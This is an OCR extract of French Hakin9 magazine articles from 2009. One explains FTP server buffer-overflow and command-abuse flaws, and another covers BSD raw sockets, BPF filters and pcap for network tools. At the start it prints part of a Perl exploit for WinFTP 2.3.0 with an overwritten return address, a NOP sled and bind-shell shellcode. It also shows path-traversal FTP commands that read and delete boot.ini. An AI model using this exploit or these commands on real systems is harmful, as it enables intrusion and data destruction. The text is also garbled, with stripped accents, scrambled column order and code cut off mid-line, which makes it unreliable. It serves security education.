($ARGV[3] == '1'){ print "[=] Done. Command shell on port 7777.\n\n"; } elsif ($ARGV[3] == '2'){ print "[=] Done. WinFTP should be crashed.\n\n"; } else{ print "[=] Done.\n\n"; }

$sock = new IO::Socket::INET ( PeerAddr=> "$host", PeerPort=> "$port", Proto => 'tcp' ); die "Connection failed: $!\n\n" unless $sock; $user_string = "user $username\r\n"; $pass_string = "pass $password\r\n"; $port_string = "PORT 10,0,0,1,154,119\r\n"; $address2k = "\x74\xf8\x74\x02". # This needs to contain any # readable address, or we # immediately cause an exception. "\x14\xfc\x75\x02". # This will become EIP. It points # to our shellcode. "\x74\xf8\x75\x02"; # This specifies what DWORD to overwrite. # YMMV here. I picked an arbitrary # return address on the stack located # near where ESP was during # the exception. On my system this is # # 0275F874 73D34154 RETURN # to MFC42.73D34154 $nopsled = "\x90" x 2228; # Metasploit win32_bind, EXITFUNC=process LPORT=7777 $shellcode = "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\ xf4\x5b\x81\x73\x13\x10". "\x92\xe9\xd3\x83\xeb\xfc\xe2\xf4\xec\xf8\ x02\x9e\xf8\x6b\x16\x2c". "\xef\xf2\x62\xbf\x34\xb6\x62\x96\x2c\x19\ x95\xd6\x68\x93\x06\x58". "\x5f\x8a\x62\x8c\x30\x93\x02\x9a\x9b\xa6\ x62\xd2\xfe\xa3\x29\x4a". "\xbc\x16\x29\xa7\x17\x53\x23\xde\x11\x50\ x02\x27\x2b\xc6\xcd\xfb". "\x65\x77\x62\x8c\x34\x93\x02\xb5\x9b\x9e\ xa2\x58\x4f\x8e\xe8\x38". "\x13\xbe\x62\x5a\x7c\xb6\xf5\xb2\xd3\xa3\ x32\xb7\x9b\xd1\xd9\x58". "\x50\x9e\x62\xa3\x0c\x3f\x62\x93\x18\xcc\ x81\x5d\x5e\x9c\x05\x83". "\xef\x44\x8f\x80\x76\xfa\xda\xe1\x78\xe5\ x9a\xe1\x4f\xc6\x16\x03". "\x78\x59\x04\x2f\x2b\xc2\x16\x05\x4f\x1b\

36 HAKIN9 6/2009

ExPLoITATIoN dEs FAILLEs vIA ProTocoLE FTP

amoindrie. Certains considreront ces propos trop alarmistes et parfaitement infonds. De ce fait, posons-nous la question cruciale: Qu'en-est-il vraiment? Peut-on dfinir l'ampleur de la problmatique avec efficacit et prcision? Comment rpondre ce paradoxe FTP? En thorie, cette vulnrabilit est simple comprendre. Imaginons une application au stade du dveloppement. Dans le code source, l'une des allocations de mmoire rclame un volume de n octets. Mais que se passe-t-il lorsque l'entre dpasse le volume qui lui est accord, comprendre n octets. Selon le degr du dbordement, il se produit un dcalage important dans la pile. Le chaos rsultant de cette mcanique provoque habituellement un arrt du programme, un dni de service (DoS). Nanmoins, il est possible d'exploiter cette faille afin d'excuter des commandes autrement interdites en profitant des droits accords au programme vulnrable. Comment est-ce possible? Lorsque le dbordement s'emploie utiliser plusieurs centaines (voire des milliers) d'octets, le dcalage est tel qu'il vient craser le rEIP, comprendre le registre de pile correspondant l'adresse de retour sur instruction. Si le volume exact est clairement identifi, un dbordement peut redfinir la variable de 4 octets contenue dans le rEIP afin de rebondir sur une portion de code supplmentaire. Durant l'exploitation d'un BOF, il convient de sauter sur un segment de la chane de caractres (notre allocation tampon) qui comporte un ShellCode. Celui-ci est excut avec les droits de l'application vulnrable. Ainsi, nous pouvons traduire le principe selon 3 tapes essentielle : Une allocation de mmoire est dborde, Le rEIP de la pile dynamique est cras, Un flux de commandes (shellcode) est excut. Considration pratique du sujet. Aprs examen, il apparat (et ce n'est pas un hasard) que les serveurs FTP sont souvent rfrencs application vulnrable sur les sites spcialiss dans l'information des failles nouvelles. Parfois, le pourcentage atteint des proportions effrayantes, pratiquement 25% de l'ensemble des vulnrabilits archives. Ainsi, un quart des failles exploitables via internet (remote) se concentre au seul service FTP voqu dans ce dossier. A cet effet, prenons le temps d'analyser les derniers mois 2008/2009 et selon le site Milw0rm (une rfrence dans le milieu). Attachons-nous seulement aux failles exploitables, oubliant les simples DoS rudimentaires. Le rsultat est bouleversant car sur une centaine de failles dclares, une trentaine s'attachent corrompre un systme via un service FTP vulnrable. Plemle, nous retrouvons nos prcdentes commandes dans un usage discutable. Voici quelques exemples parmi tant d'autres: L'application FTPdmin 0.96 est vulnrable un dbordement de tampon via la commande RNFR (rename from), L'application WinFTP 2.3.0 est vulnrable un dbordement de tampon via la commande LIST (listing des fichiers et rpertoires), L'application VicFTP 5.0 est vulnrable un dbordement de tampon via la commande LIST (listing des fichiers et rpertoires), L'application Eserv 3.x FTP Server est vulnrable un dbordement de tampon via la commande ABOR (clture de session), L'application VxFtpSrv 2.0.3 est vulnrable un dbordement de tampon via la commande CWD (change working directory). bien qu'elles permettent de s'attribuer des privilges autrement interdits. Ces failles ne sont pas complexes et se rsument une ligne de commande associe une astuce (principalement un disclosure). Encore une fois, nous pouvons analyser quelques-unes de ces ambiguts: L'application Dream FTP Server est vulnrable un dtournement de la commande RETR (retreive), L'application GuildFTPd FTP Server 0.999.14 est vulnrable un dtournement de la commande DELE (delete), L'application Null FTP Server 1.1.0.7 est vulnrable un dtournement de la commande SITE (ajout d'un service), L'application Serv-U 7.3 est vulnrable un dtournement de la commande RNTO (rename to), L'application Femitter FTP Server 1.x est vulnrable un dtournement des commandes RETR, MKD, RMD
et DELE.

Nous pouvons aussi faire figurer un modle explicite afin de bien discerner le problme. Ainsi, si la nature d'une commande n'est pas vrifie avec vigilance, un usag malveillant peut injecter une commande autrement interdite. Quelques caractres quelconques suffisent rvler des informations sensibles. Voici un modle du genre simple qui exploite de nombreuses failles sous Femitter FTP Server 1.x (selon l'exploit de Jonathan Salwan). Les doubles points associs aux slashs permet de remonter dans l'arborescence du serveur:
You can delete file boot.ini => You can get file boot.ini => You can create Directory => You can delete Directory => You can crash service => (RETR 0)x2 RMD ../../WINDOWS MKD ../../poc RETR ../../boot.ini DELE ../../boot.ini

Nous avons parl des failles de type dbordement de tampon, mais il faut aussi citer les lignes de commandes qui ne sont pas contrler convenablement, si

6/2009 HAKIN9

37

FOCUS
Coder un exploit afin de d'exploiter une faille FTP.

L'examen de toutes ces failles est intressant mais il convient aussi de se pencher sur le caractre pratique de l'objet tudi. Pour ce faire, nous allons dcortiquer un exploit cod sous Perl afin d'exploiter une faille de type dbordement via un serveur FTP, en l'occurence WinFTP 2.3.0 (serveur FTP trs rpandu sur la toile). Comme nous l'avons prdemment expliqu, la commande LIST ne vrifie pas la longueur de la chane de caractres passe en commande. Le dbordement est important est permet l'excution d'un ShellCode sous Windows 2000 notamment (un BindShell). Le code ci-dessous est particulirement explicite (exploit dvelopp par Joe Walko):

Conclusion

La thorie du paradoxe FTP est maintenant explique et repose ainsi sur une complmentarit hasardeuse entre les fonctions d'un programme quelconque. Les algorithmes complexes propres ces expriences n'apportent rien concrtement notre dossier. Ce que nous voudrons retenir c'est que la surabondance de commandes dans une application engage (sur un plan mathmatique) une plus grande chance de trouver une faille exploitable. Certes, les paradoxes probabilistes sont contre-intuitifs ou tout simplement prsentant diffrents rsultats selon l'interprtation que l'on fait de l'nonc parmi plusieurs possibilits lgitimes ou non. En vrit, le mot paradoxe est un abus de langage. Nanmoins, l'esprit du paradoxe nonc se trouve confirm dans le nombre important des failles recenses sur des sites comme Milw0rm. Effectivement, si le protocole FTP reposait sur 5 commandes uniquement, les chances d'aboutir une faille serait beaucoup plus faible (principe des probabilits). Pour conclure sur l'exploitation des failles par dbordement, nous pouvons utiliser l'exploit auparavant expliqu afin de constituer un code de test en environnement FTP.
38 HAKIN9 6/2009

Quelques modifications minimes nous permettraient de vrifier l'intgrit de chacune des allocations de mmoire propres aux diffrentes commandes. Plus simple encore, il existe cette application que chacun doit connatre parfaitement, il s'agit du Metasploit. Ce service propose beaucoup d'exploits afin de vrifier l'intgrit d'un service FTP notamment. Particulirement intuitif (presque convivial), il est en constante volution grce la communaut importante des administrateurs, des programmeurs et des pirates. Sans doute l'une des plus grande russite des 10 dernires annes. Bien entendu, cette application figure sur le CD offert avec votre magazine Hakin9. Afin d'viter cette corruption au sein d'un systme, il convient d'assurer et de (re)penser plusieurs concepts importants. Un serveur FTP doit tre considr comme un objet volutif, comprendre sans finalit de dveloppement. Chaque jour, il convient d'agir avec vigilance! Le principe de veille informatique est simple mais parmi les plus efficaces. Ainsi, il faut prendre connaissance des dernires failles dcouvertes (0day), des nouvelles mthodes de compromission et des nouveaux exploits afin d'infiltrer un systme. Si un administrateur n'agit pas avec ce souci de vigilance, il peut se retrouv compltement dpass par des vnements rcents et subir les foudres de quelques-uns. Ajoutons qu'en 2 ans et demi, Milw0rm a recens plus de 120 failles rien que sur des services FTP, soit prs d'une par semaine. Le deuxime aspect est tout aussi important! Nous savons qu'un flag d'identification annonce un rapport d'change. Parfois, il signale la nature de l'application FTP. Or, c'est dj trop! Si on donne chacun la possibilit de se documenter sur les applications en service sur notre systme, cette fantaisie peut se retourner contre nous et devenir une faiblesse, un talon d'achille . De ce fait, il convient d'utiliser un service FTP sain (comprendre sans failles rfrences) et qui ne dlivre pas forcment de flag d'identification instructif (code 220). Les plus

sur Internet
http://abcdrfc.free.fr/rfc-vf/rfc959.html RFC 959 en franais http://www.ietf.org/rfc/rfc2228.txt RFC 2228 en anglais http://www.ftp-sites.org Liste importante de FTP anonymes http://www.milw0rm.com Site Milw0rm http://www.metasploit.com Site Metasploit Afin de saisir le principe des probabilits (conditionnelles ou non), vous pouvez trouver matire rflexion sur le site Wikipedia: Axiomes des probabilits, Paradoxe des probabilits, Andrey Kolmogorov, etc.

responsables parmi nous utilisent mme un diteur hexadcimal afin de modifier les flag d'identification des service FTP, POP ou encore HTTP. Cette pense est trs intelligente et mrite une rflexion personnelle. Dans l'ignorance du produit distant, un pirate se trouve dans l'impossibilit de dterminer la faille avec certitude. Souvenons-nous que dans un registre identique, la majorit des services distants comme FTP, POP, SMTP, HTTP et autres repose aussi sur la complmentarit des commandes. Avec les programmes FTP, les serveurs WEB connaissent aussi beaucoup de failles. D'une nature trs proche des applications FTP, les serveurs HTTP disposent aussi de trs nombreuses commandes. De ce fait, ils composent prs de 10% des failles rfrences sur Milw0rm. Ainsi, le mot de la fin repose sur un certain pessimisme car il ne suffit pas d'utiliser une application quelconque certifie par quelques-uns afin de se prmunir de la faille insidieuse et du paradoxe des probabilits. La vigilance est primordiale! sicchia didier

Sicchia Didier est l'origine de nombreux exploits, dossiers et articles divers pour plusieurs publications francophones consacres la scurit informatique et au dveloppement. Autodidacte et passionn, son exprience se porte notamment sur les shellcodes, les dbordements d'allocations de mmoire, les RootKits, etc. Plus que tout autre chose, c'est l'esprit alternatif de la communaut UnderGround qui le motive. Pour contacter l'auteur : didier.sicchia@free.fr

ExPLoITATIoN dEs FAILLEs vIA ProTocoLE FTP

6/2009 HAKIN9

39

FOCUS
Henri Doreau

Dveloppement d'outils de scurit rseau sous BSD

Les systmes BSD sont trs prsents dans le monde de la scurit informatique. nous allons voir qu'en plus d'tre fiables et efficaces, ils offrent de puissants mcanismes d'injection/rception de paquets. Ces mcanismes sont parfaitement adapts au dveloppement d'outils de scurit et administration rseau. La librairie PCaP apporte cette puissance aux autres systmes Linux, Windows, Solaris...)

Degr de difficult

Prsentation de la famille BSD

Historique
Le terme " famille BSD " dsigne les OS NetBSD, FreeBSD, OpenBSD, leurs drivs, ainsi que plus largement Darwin (Apple) et Sun OS. La premire version de BSD est sortie en 1978 l'universit de Berkeley ( l'origine du nom " Berkeley Software Distribution "). Elle progresse rapidement et en 1982, la version 4 reoit une premire implmentation de TCP/IP du "Computer Systems Research Group". Cette implmentation servira ensuite de base de nombreuses autres piles TCP/IP. Ayant bien sr volue depuis, elle conserve sa rputation de solidit et d'efficacit. Mais ce sur quoi nous allons nous attarder sont les fonctionnalits qu'elle offre aux programmeurs rseau, et spcialement en ce qui concerne les outils de scurit informatique. En effet, dans ce domaine, nos besoins sont trs spcifiques, outre la ncessit de pouvoir forger des paquets, il faut pouvoir compter sur une grande efficacit en mission comme en rception avec la fiabilit et la prcision dans le temps. Les *BSD nous permettent tout cela!

organisation de la pile tCP/iP de freeBSD

Rappels sur l'organisation du rseau en couches.
Le modle OSI permet de dcrire la manire don't les donnes transmises sur un rseau sont encapsules. Il propose un dcoupage en sept couches : Lorsqu'une application envoie des donnes sur une liaison TCP tablie, ces donnes sont transmises au travers de la pile TCP/IP du systme d'exploitation. Chaque couche traverse ajoute un en-tte aux donnes. Au final, la trame Ethernet telle que nous pouvons l'observer dans tcpdump ou wireshark prsente un en-tte Ethernet, un entte IP, un en-tte tcp, un http... les protocoles s'empilent. Dans cet article nous nous rferrerons beaucoup aux couches 2 et 4, qui sont les couches de liaison ("link layer") et de transport ("transport layer"). Injecter sur la couche deux signifie construire une trame partir de l'entte Ethernet. La couche 4 correspond elle aux protocoles TCP ou UDP par exemple.

Cet artiCle exPlique...

Le fonctionnement gnral de la pile TCP/iP des systmes BSD, Les mcanismes avancs d'injection/rception de paquets sous *BSD, L'utilisation et le fonctionnement de la librairie Pcap.

Ce qu'il faut Savoir...

Programmation rseau en C, Gnralits sur ethernet. 40 HAKIN9 6/2009

BSD
Transmission par mbufs
Les mbufs sont la brique de la pile TCP/IP des systmes BSD. Les mbufs sont implments sous forme de structures dans le noyau et permettent la transmission des informations entre les diffrentes parties de la pile TCP/IP. Leur capacit se chaner en une liste permet l'implmentation des diffrentes couches. Grossirement, chaque couche rajoutant un mbuf contenant l'en-tte du protocole associ au dbut de la liste. Ces tches sont effectues par les fonctions "d'output" : udp_output(), ip_output(), Ethernet_ output()... Au final, le paquet arriv en bas de la pile de protocoles est sous forme d'une chaine de mbufs, laquelle est analyse par le pilote Ethernet, qui envoie la trame sur les fils (nous sommes alors sur la couche 1 : physique). Paralllement, il existe les fonctions "d'input", qui se chargent de reconstruire une chaine de mbufs partir paquets entrants. Il est intressant de connaitre leur existence, car on peut tre amen lors de l'criture d'un programme gourmand en ressources rseau, d'avoir augmenter le nombre de mbufs que le kernel nous autorise.

Listing 1: ouverture d'un /dev/bpf

int open_bpf(void) { char buff[11]; int i=0, fd=-1; do { sprintf(buff, "/dev/bpf%u", i); fd = open(buff, O_RDWR); } while (fd<0 && ++i<10); return fd; }

Listing 2: Exemple d'utilisation de select() pour la rception/injection de trames.

int injection_loop(uint32_t idle, int fdsend, int fdrcv ) { char done = 0, timedout; /* variables de controle de boucle */ int n; fd_set fds; /* descripteurs de fichiers surveiller */ struct timeval timeout; while (Loop) { /* Loop est une variable globale contrle par le gestionnaire de signaux */ /* Le temps attendre entre deux envois est convertis en timeout pour la fonction de rception */ timeout.tv_sec = idle/1000; timeout.tv_usec = (idle%1000)*1000; FD_ZERO(&fds); FD_SET(fdrcv, &fds); for (timedout = false; !timedout && Loop;) { n = select(fdrcv+1, &fds, NULL, NULL, &timeout); switch (n) { /* erreur */ case -1 : if ( errno == EINTR ) return 0; /* ctrl+c */ perror("[injection_loop] select()"); Loop = 0; return 1; /* aucune donnee reue */ case 0 : timedout = true; continue; /* reception d'un paquet */ default : if ( FD_ISSET(fdrcv, &fds) == 0 ) { timedout = true; continue; } else { /* * Appeler recv() sur la socket de reception (fdrcv) * et traiter les donnes reues ici... * man recv(2) */ } } } /* * Envoyer nos paquets ici * sur la socket fdsend * man send(2) */ } return retVal;

Raw sockets
Aprs ces informations un peu lourdes, passons aux choses plus croustillantes. Les raw sockets permettent un processus de forger un paquet en slectionnant la couche sur laquelle il veut l'injecter. Ainsi, il est possible de concevoir un paquet avec un en-tte TCP sur mesure, et laisser le noyau s'occuper de remplir les enttes IP et Ethernet, ou de modifier galement l'entte IP. Ce qui se passe aprs (injection sur la couche 1), dpasse le cadre de cet article et nous nous limiterons donc aux couches suprieures. L'utilisation d'une raw socket requiert d'tre root sur la machine, pour des raisons de scurit. Ces fameuses "sockets brutes" constituent une composante majeure

6/2009 HAKIN9

41

FOCUS
Listing 3: utilisation des fonctions kqueue()/kevent()
#include #include #include #include #include #include #include #include #include #include <stdio.h> <string.h> <stdlib.h> <fcntl.h> <sys/ioctl.h> <signal.h> <sys/types.h> <sys/event.h> <sys/time.h> <sys/socket.h> strcpy((char *)iface.ifr_name, "nfe0"); if (ioctl(ll, BIOCSETIF, &iface) < 0) { close(ll); perror("[open_bpf] ioctl BIOCSETIF"); return 3; } else if (ioctl(ll, FIONBIO, &one) == -1) { /* mode non bloquant */ perror("[open_bpf] ioctl FIONBIO"); close(ll); return 4; } /* ajout d'un vnement dans la kqueue */ EV_SET(&changelist, ll, EVFILT_READ, EV_ADD | EV_ONESHOT, 0, 0, NULL); while (Loop) { n = kevent(kq, &changelist, 1, &eventlist, 1, &ts); switch (n) { case -1 : perror("kevent"); return; case 0 : /* timeout, reboucler */ break; default : /* donnees recues */ printf("[+] %d octets disponibles\n", eventlist.data); /* * !! Lire les trames ici !! */ } } close(kq); close(ll); return 0;

#include <net/ethernet.h> #include <net/bpf.h> #include <net/if.h> static int Loop = 1; /* callback pour le gestionnaire de signaux */ void do_exit(int sig) { Loop = 0; } int main(void) { int ll, kq, n, one=1; uint8_t dst; struct ifreq iface; struct timespec ts = {6, 0}; struct kevent changelist, eventlist; signal(SIGINT, do_exit); /* gestionnaire de signaux */ kq = kqueue(); /* ouverture d'une nouvelle kqueue */ if (kq == -1) { perror("[main] kqueue"); return 1; } ll = open_bpf(); /* voir listing 1 */ if (ll == -1) { perror("[main] open"); close(kq); return 2; } /*attacher le bpf une interface rseau */

des outils de scurit/diagnostique rseau. Du vnrable ping au tout puissant nmap...

/dev/bpf
L'accs la couche de liaison se fait par l'intermdiaire des /dev/bpf (BPF pour Berkeley Packets Filter), et ceci sans aucun problme de protocole. Ces bpf sont la pice maitresse autour de laquelle nous allons construire nos applications. Il se manipulent comme des fichiers usuels.
42 HAKIN9 6/2009

Vous pouvez injecter absolument tout et n'importe quoi ici. En lecture, vous pouvez observer les trames qui atteignent l'interface rseau correspondante (voir plus loin), mme celles destines aux autres machines du rseau. L'quivalent sous Linux est la raw socket de type PF_PACKET. L'accs se fait en essayant d'ouvrir /dev/bpf0, puis /dev/bpf1etc... jusqu' ce que l'on en trouve un de disponible. Chaque ouverture d'un bpf gnre la cration d'un nouveau pour un ventuel autre processus.

algorithmes asynchrones d'injection/rception de paquets

Dsigns dans la littrature anglosaxonne de "Asynchrone IO multiplexing", ces algorithmes sont la base de bon nombre de programmes rseaux. L'objectif tant dans un programme monothread, d'injecter des paquets une frquence contrle, sans connatre l'avance la vitesse et le nombre de rponses. Ils ne sont pas spcifiques aux raw sockets, mais sont bien adapts aux contraintes des outils de scurit rseau.

BSD
Autour de select()
Une premire technique est d'utiliser pour cela des sockets non bloquants et la fonction select(2) La fonction select(2) permet de surveiller des ensembles de descripteurs de fichier. Lorsque des vnements se produisent sur ces descripteurs (typiquement des sockets, mais pas uniquement, magie d'unix oblige!), ils sont rorganiss dans des sous ensembles, qu'il faut ensuite analyser. On peut ensuite effectuer les actions apropries (rception du paquet si disponible, retransmission si aucune rponse...) Cet algorithme est portable mais prsente une limitation importante. Select() ne peut traiter que FD_SETSIZE sockets. Ce nombre, par dfaut 1024, peut rapidement tre atteint, mme sur des applications de taille moyenne. Malgrs tous ses inconvnients, la portabilit de la fonction select() fait qu'on la retrouve dans de nombreux logiciels. C'est autour d'elle que fonctionne le logiciel nmap par exemple. kernel, et sont donc intressantes en terme de performances. La premire, kqueue(), cre une nouvelle file dans le noyau. Il est noter que cette file n'est pas duplique lors d'un appel fork(). La macro EV_SET, permet ensuite d'enregistrer les vnements qui nous intressent, pour le descripteur de notre choix. Ensuite, la surveillance de ces vnements se fait par l'appel kevent(). Le code fourni titre d'exemple dans le listing 3 permet de surveiller une interface rseau (ici nfe0). L'exemple a t choisi pour des questions de compacits, videmment, l'intrt de ces deux fonctions s'impose Listing 4: construction d'une trame
typedef struct { uint32_t champ1; uint16_t champ2; uint16_t champ3; } header_t; uint8_t packet[64] = ""; header_t * trame; trame = (header_t *)packet; trame->champ1 = 12; trame->champ2 = 34; ...

lors de la gestion en parallle de nombreux descripteurs de fichiers. Par exemple dans des serveurs tcp multiclients monothread.

l'injection/rception de paquets
Construction du paquet
La seule difficult ici consiste garder les donnes alignes en mmoire. En effet, rien ne garanti que les champs d'une structure sont contigus en mmoire. Le compilateur peut introduire quelques octets entre deux champs pour assurer qu'ils seront aligns sur des adresses multiples de 4. Or, il est pratique d'utiliser des

Autour de poll(2)
Pour pallier cela, une interface plus moderne existe : la fonction poll(). Elle accepte un nombre illimit de descripteurs de fichier (FD), mais prsente elle aussi un inconvnient important : la liste de ces Fds est parcourue chaque appel. Ceci peut rellement poser des problmes de performance, rendant les programmes peu volutifs...

Listing 5: Ouverture d'une raw socket destine l'injection de trafic TCP

if ( (s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP)) == -1 ) { perror("[open_raw_socket] socket"); }

Autour de kqueue(2)/kevent(2)
N'y a-t-il pas un moyen moderne, efficace et pratique de traiter un gros ensemble de descripteurs de fichiers? Bien sr que si, par contre il va falloir dire ds maintenant au revoir la portabilit... Notre sauveur, ou plutt nos sauveuses, sont les deux fonctions kqueue(2) et kevent(2). (Note : voir epoll(4) sous Linux, et completion ports sous Windows pour des solutions similaires) Ces deux fonctions permettent de faire traiter une file d'vnements par le

Listing 7: Pices de base des programmes BPF

BPF_STMT(opcode, operand) BPF_JUMP(opcode, operand, true_offset, false_offset)

Listing 6: Structure d'une instruction BPF

struct bpf_insn { u_short code; /* le code de l'instruction */ u_char jt; /* offset pour les instructions de branchement */ u_char jf; /* offset pour les les instructions de branchement */ u_long k; /* compteur */ };

6/2009 HAKIN9

43

FOCUS
Listing 8: exemple de filtre BPF
struct bpf_insn instructions[] = { /* charger 16 bits (halfword) du paquet, depuis la position 12 */ BPF_STMT(BPF_LD+BPF_H+BPF_ABS, 12), /* si c'est un paquet IP continuer, sinon sauter 4 instructions */ BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, ETHERTYPE_IP, 0, 4), /* charger le numero du protocole, l'offset 10 depuis la position courante */ BPF_STMT(BPF_LD+BPF_B+BPF_IND, 10), /* si le numro de protocole correspond celui d'un paquet tcp alors on le garde */ BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, IPPROTO_TCP, 2, 0), /* On regarde s'il s'agit d'un paquet UDP, et on le rejette sinon */ BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, IPPROTO_UDP, 0, 1), /* return -1 : le paquet sera trait */ BPF_STMT(BPF_RET+BPF_K, (u_int)-1), /* return 0 : le paquet ne sera pas trait */ BPF_STMT(BPF_RET+BPF_K, 0) };

Gnralits
Les BPF permettent aux processus qui les utilisent de leur fournir une "rgle de passage" ou un filtre plus simplement, afin de ne leur remonter que les trames qui les interessent. Vous comprenez maintenant pourquoi les "Berkeley Packets Filters" portent ce nom. A sa rception par l'interface rseau, une trame sera soumise au filtre du bpf, si elle le passe, elle est remonte l'application qui lit le /dev/ bpf. Sinon elle n'effectue que son trajet classique dans la pile du noyau. Les filtres BPF peuvent tre considrs comme des programmes destins une pseudo-machine. Cette pseudo-machine dispose de cinq lments : un accumulateur, un index, un registre, un compteur ordinal et de la mmoire. L'accumulateur est un registre intermdiaire de calcul (dans lequel il est possible de charger une valeur pour une opration future). L'index permet de se reprer dans le paquet en cours de traitement. Le registre permet de charger des valeurs numriques. Le compteur ordinal est implicite, il permet de se reprer dans les instructions du programme, et est utilis pour les sauts d'instructions.

structures pour reprsenter les champs d'un paquet. Pour cela, on utilise un tableau (donc contige en mmoire), et un pointeur sur une structure du type qui nous convient. Par la suite, cette mthode garanti un accs ais aux diffrents champs de la trame.

puis d'crire les donnes dedans, comme on crirait dans un fichier quelconque, l'aide de l'appel systme write(2).

rception de paquets sur raw sockets

injection

L'mission est triviale. Une fois la socket ouverte et les donnes prtes, un simple appel la fonction sendto(2) effectuera l'opration. Si l'adresse de destination ne change pas entre les diffrents appels, il est possible de connecter la socket (avec connect(2)) et ainsi gagner en performances en utilisant la fonction send(2). L'ouverture de la socket se fait via l'appel systme socket(). Voir man socket pour plus d'informations. Le listing suivant illustre l'ouverture d'une socket brute destine injecter des trames TCP. C'est dire que les donnes qui lui seront envoyes seront positionnes au dessus du header IP, et que celui-ci contiendra un champ indiquant qu'il s'agit d'un paquet TCP. L'injection peut galement se faire sur la couche de liaison. Lorsque l'on souhaite modifier l'adresse MAC source ou utiliser le protocole ARP par exemple. Pour cela, il suffit de prparer la trame dans un tableau, comme vu prcdemment, d'ouvrir un /dev/bpf,
44 HAKIN9 6/2009

Sous freeBSD, il n'est pas possible de recevoir des trames TCP ou UDP sur des raw sockets. C'est l un comportement diffrent de celui de Linux par example. Il faudra donc aller les chercher depuis la couche de liaison du rseau, via les /dev/bpf.

rception de paquets sur /dev/bpf

La rception sur les fichiers /dev/bpf consiste en une simple opration de lecture. Problme cependant, capturer l'information si bas dans la pile de protocoles, nous avons beaucoup plus de traffic que si nous ne traitions que les protocoles trs haut niveau. Par exemple, si nous forgeons une connection tcp, les rponses de la cible vont tre noyes au milieu de tout le traffic (ARP, autres connections tcp en cours, dns...). Il serait ncessaire de pouvoir filtrer les trames qui parviennent notre application afin de ne pas la surcharger inutilement. L encore, magie de BSD, c'est possible (voir amusant!).

Un filtre est un tableau d'instructions. Une instruction est une structure dfinie ainsi : mais pour simplifier l'utilisation de ce mcanisme, les auteurs ont prvus un ensemble de macros. L'objectif tant Table 1. Modle OSI N 7 6 5 4 3 2 1 Nom Application Prsentation Session Transport Rseau Liaison Physique Exemple HTTP, FTP LPP RPC TCP, UDP IP Ethernet Fibre optique...

BSD
de bpf(4). Trs complte, elle propose en plus quelques exemples de filtres. Construire le "programme" pour la pseudo machine est une tche simple, dans la mme fonction, au dessous de la dclaration prcdente, il suffira de faire :
struct bpf_program programme = { instructions /* instructions };

Sur Internet
http://www.tcpdump.org site de la librairie pcap, http://www.winpcap.org le site de la librairie winpcap, http://www.freebsd.org le site officiel du projet FreeBSD proposant tlchargement et documentation du systme FreeBSD, http://www.unix-junkies.org site de l'auteur.

7, /* nombre d'instructions */

du programme/filtre

vraiment de rapprocher l'criture de ces filtres de l'criture d'un logiciel en assembleur. Les premires connaitre sont BPF STMT et BPF_JUMP. La premire stipule que l'instruction qu'elle contient est un "statement", une action sur les donnes du paquet qui cherche passer le filtre. La seconde stipule que l'instruction qu'elle contient est un saut conditionnel, permettant de passer un autre endroit du filtre selon le rsultat d'un test. Pour la syntaxe des instructions, le mieux est d'tudier un exemple...

En pratique, pour appliquer ce filtre sur le /dev/bpf que nous avons ouvert, il faut utiliser un ioctl, une fois les deux dclarations prcdentes effectues, et une fois le bpf ouvert et rattach une inter face rseau.
ioctl(fd, BIOCSETF, &programme);

De plus, ils peuvent tre gnrs trs facilement l'aide de fonctions du genre snprintf() de manire dynamique. Une version Windows de la librairie PCAP existe. Dveloppe par la socit CACE Technologies, elle s'appelle WinPcap. Depuis que Microsoft a retir les raw sockets de windows (ou les a fortement brid, selon les versions), cette librairie permet de continuer de dvelopper des outils rseau puissants pour ce systme. Cependant les contraintes lies l'obligation d'injecter sur la couche de liaison sont importantes...

Limites
Malheureusement, cette librairie ne saurait tre parfaite. Et certaines de ses limites peuvent pousser un dveloppeur lui prfrer les mcanismes natifs. Le premier est contournable facilement mais peut tre droutant pour les dbutants avec la libpcap : il s'agit de la gestion des timeouts. Ceuxci me sont pas supports sur tous les systmes d'exploitation (par example sous Linux). Le second, plus gnant, est la performance. La libpcap peut introduire des temps de latence plus ou moins important entre la capture effective du paquet et sa transmission au processus l'coute (50ms). Lorsque la portabilit n'est pas la principale contrainte dans un projet, faire appel aux mcanismes natifs fournis par le noyau s'avre toujours payant en terme de performances.

Portage sous les autres systmes : la librairie pcap

Prsentation
Le nom de la librairie (bibliothque pour les puristes...) PCAP vient de Packet CAPture. Et c'est effectivement ce pour quoi elle est conue. Ecrite par les dveloppeurs du logiciel tcpdump, pcap est une manire lgante et portable de capturer des paquets comme au travers d'un bpf. Plus gnralement elle reprend les caractristiques des bpf et permet leur utilisation sous les systmes ne possdant pas ce mcanisme.

Exemples
L'exemple est un filtre permettant de ne slectionner que le traffic TCP ou UDP. Le code est fourni dans le Listing 8. On remarquera que les instructions se combinent via le signe '+'. Dans la premire ligne, l'instruction BPF _ LD permet le chargement (load) d'une valeur sur seize bits (halfword), la position 12 depuis le dbut du paquet (adressage absolu). La seconde instruction est un saut conditionnel. Le saut de quatre instructions est effectu si la valeur charge l'instruction prcdente n'est pas gale 'K', savoir la constante ETHERTYPE _ IP. La suite du programme est similaire, l'exception peut tre de l'instruction 3, o l'on charge une valeur sur huit bits ( BPF _ B) depuis la position courante l'aide de BPF _ IND (adressage index). Pour le dtail de toutes les instructions, reportez-vous la page de manuel

Avantages
La fiabilit et la portabilit sont assurment les deux avantages majeurs de cette librairie. Cependant, une de ses fonctionnalit est remarquable, la possibilit de transmettre des filtres dans un langage comprhensible par l'homme! Ainsi, les filtres suivants auront le mme effet que les filtres bpf vus prcdement, mais sont autrement plus simples lire :
tcp or udp

Conclusion

Cet article vous a fourni les bases pour concevoir des outils puissants sous BSD mais aussi sous les autres systmes d'exploitation avec la librairie PCAP. Si vous souhaitez mettre ces informations en pratique, la page de manuel Unix bpf(4) vous sera d'une aide prcieuse.

propos de l'auteur

ip src 192.168.1.1 and not port 80

L'auteur poursuit un cursus d'ingnieur rseaux et tlcoms l'ESEO. Il est galement charg de la direction du systme d'information du SEIO. Il s'implique galement dans des projets OpenSource et coadministre le site www.unix-junkies.org. 6/2009 HAKIN9 45

Rgis sENET

BACKUP AIDE,

Comment surveiller lintgrit de votre systme ?

